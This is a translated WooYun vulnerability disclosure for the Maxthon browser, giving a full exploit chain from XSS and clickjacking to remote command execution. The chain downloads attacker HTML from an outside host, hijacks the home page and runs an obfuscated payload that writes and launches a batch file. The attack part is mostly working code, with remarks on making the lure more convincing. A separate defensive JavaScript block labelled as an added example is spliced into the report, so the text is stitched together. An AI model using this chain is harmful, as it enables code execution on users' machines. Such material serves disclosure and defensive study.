WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-04-02: Details reported to the vendor, awaiting the vendor's handling
2015-04-02: Vendor confirmed; details disclosed to the vendor only
2015-04-05: Details opened to third-party security partners
2015-05-27: Details disclosed to core white hats and domain experts
2015-06-06: Details disclosed to regular white hats
2015-06-16: Details disclosed to intern white hats
2015-07-01: Details disclosed to the public
A Maxthon browser flaw, combined with clickjacking, can lead to remote command execution
When Maxthon opens an RSS feed it uses its own built-in RSS reader (see screenshot).
Try changing the URL to
mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?javascript:alert(location.href)
When the title is clicked, the JS is executed. Thinking about how to exploit this, clickjacking can be used. Although the Internet zone cannot access the MX zone, the File zone can. So an HTML file can be written into the File zone that embeds the MX zone in an iframe. To write a file into the File zone, Maxthon's own API can be used.
external.mxCall('InstallApp', "http://utf7.ml/t/exec1.html");
Calling this interface writes a file into the Temp directory; the full path is obtained with the following interface
maxthon.system.Environment.getFolderPath('Mx3data');
Next, it is only necessary to visit that file; when the user clicks, arbitrary commands are executed. So the overall flow is: the user visits a URL => the interface is called to download the malicious HTML => that HTML file is set as the home page => the user opens the browser and clicks anywhere on the home page => the command chosen by the attacker runs. The PoC is therefore constructed as follows
external.mxCall('InstallApp', "http://utf7.ml/t/exec1.html");
var url = maxthon.system.Environment.getFolderPath("Mx3data")+"Temp/exec1.html";
maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.startpage",url);
The source of exec1.html is as follows
<style>
html, body { background: url(http://utf7.ml/t/bg1.jpg); cursor: pointer;}
#box, #box > * { position: absolute; width: 300px; height: 50px; border: 1px solid red; opacity: 0;}
#victim { border: none;}
</style>
<div id="box">
 <iframe id="victim" src="mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?javascript:eval(String.fromCharCode(118,97,114,32,97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,97,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,97,112,112,47,37,55,66,51,51,67,65,54,48,68,54,45,69,65,68,67,45,52,53,53,56,45,57,49,56,53,45,50,69,66,69,49,52,50,49,52,65,66,57,37,55,68,47,105,110,100,101,120,46,104,116,109,34,59,97,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,98,61,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,70,105,108,101,46,99,114,101,97,116,101,84,101,109,112,70,105,108,101,40,41,59,98,46,110,97,109,101,95,32,61,32,34,68,58,47,116,101,115,116,46,98,97,116,34,59,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,70,105,108,101,87,114,105,116,101,114,40,98,41,59,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,119,114,105,116,101,84,101,120,116,40,34,99,109,100,32,47,107,32,100,105,114,34,41,59,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59,115,101,116,84,105,109,101,111,117,116,40,39,118,97,114,32,99,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,99,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,99,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,99,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,68,58,47,116,101,115,116,46,98,97,116,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,41,59,39,44,49,48,48,48,41,59))" scrolling="no"></iframe>
</div>
<script src="https://code.jquery.com/jquery-1.11.0.min.js"></script>
<script>
$(document).mousemove(function(e) { var x = e.pageX; var y = e.pageY; $('#box').css({left: x - 170, top: y - 35});});
</script>
This is only for demonstration, so I simply used a screenshot of i.maxthon.cn as the background; in real exploitation it could be made far more convincing. PS: the image is hosted on a server outside China; if it does not load during testing, upload it to a domestic server instead. The PoC is invoked through the following URL
http://web.maxthon.cn/appeal/appeal.php?q=%22%3E%3Cscript%20src=http://utf7.ml/t/maxthon3.js%3E%3C/script%3E
After visiting the URL above, the next time the victim opens the browser the home page has been changed as shown below.
Clicking anywhere on the home page executes the command.
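The chain above rests on two weaknesses in the privileged preview page: it navigates to whatever string follows the `?` in its query, so a `javascript:` URL runs with the page's privileges, and it can be embedded from the File zone, which is what makes the clickjacking overlay possible. The following JavaScript is an added, defender-side example and is not part of the original report or of Maxthon's code. It shows the two checks such a page would perform: a scheme allowlist applied to the parsed URL, so that case changes, leading whitespace, embedded tabs or newlines, and custom schemes such as `mx:` or `file:` are all refused, and a refusal to render when framed. `safeHref`, `isFramed`, `classify` and the 2048-character limit are hypothetical names and values chosen for the example; the sample inputs are constructed.

```javascript
// Added example (not from the report, not Maxthon's code): hardening checks for a
// privileged page that receives a link in its query string and may be embedded.

// Only ordinary web URLs may be navigated to from the query string.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Return a normalized absolute http(s) URL, or null if the input must be refused.
// The decision is made on the *parsed* scheme, not on the raw string: the WHATWG
// URL parser lower-cases the scheme, strips leading/trailing whitespace and
// removes embedded tabs and newlines, so obfuscated "javascript:" variants all
// normalize to the same refused scheme. No base URL is given, so relative
// input (which would otherwise resolve inside the privileged origin) is refused.
function safeHref(raw) {
  // 2048 is an arbitrary upper bound chosen for this example.
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) return null;
  let parsed;
  try {
    parsed = new URL(raw);
  } catch (e) {
    return null; // not an absolute URL
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;
  return parsed.href;
}

// Refuse to render when the page is not the top-level document. Takes a
// window-like object so it can be exercised outside a browser; in a real page
// this is called as isFramed(window) before any click handler is installed.
function isFramed(win) {
  try {
    return win.top !== win.self;
  } catch (e) {
    return true; // cross-origin access threw: some other document frames us
  }
}

// Constructed sample inputs, including the shape used in the report above.
const SAMPLES = [
  'http://example.com/feed.xml',
  'https://example.com/path?javascript:alert(1)', // javascript: in the query is harmless
  'javascript:alert(location.href)',
  'JaVaScRiPt:alert(1)',
  ' \tjava\nscript:alert(1)',
  'mx://res/app/x/preview.htm',
  'file:///C:/Users/victim/Temp/exec1.html',
  'preview.htm?javascript:alert(1)', // relative: refused because no base is supplied
];

// Map each sample to the URL that would actually be navigated to (null = refused).
function classify(samples) {
  return samples.map(s => ({ input: s, allowed: safeHref(s) }));
}

// Stand-alone run: print the verdict for every sample.
for (const row of classify(SAMPLES)) {
  console.log(JSON.stringify(row.input), '=>', row.allowed === null ? 'REFUSED' : row.allowed);
}
```

Note that the allowlist is on the scheme reported by the parser, never on a blocklist of strings in the raw input; a blocklist would have to anticipate every spelling the parser tolerates. The framing check is the page-level complement to a `frame-ancestors` policy, which is the preferred mechanism where the scheme handler honours Content-Security-Policy headers.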
Test environment: Maxthon 4.4.4.3000 + Win8.1
Maxthon 4.4.5.600_beta + Win8.1
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-04-02 22:58
Thanks. Website vulnerability + internal page vulnerability
None yet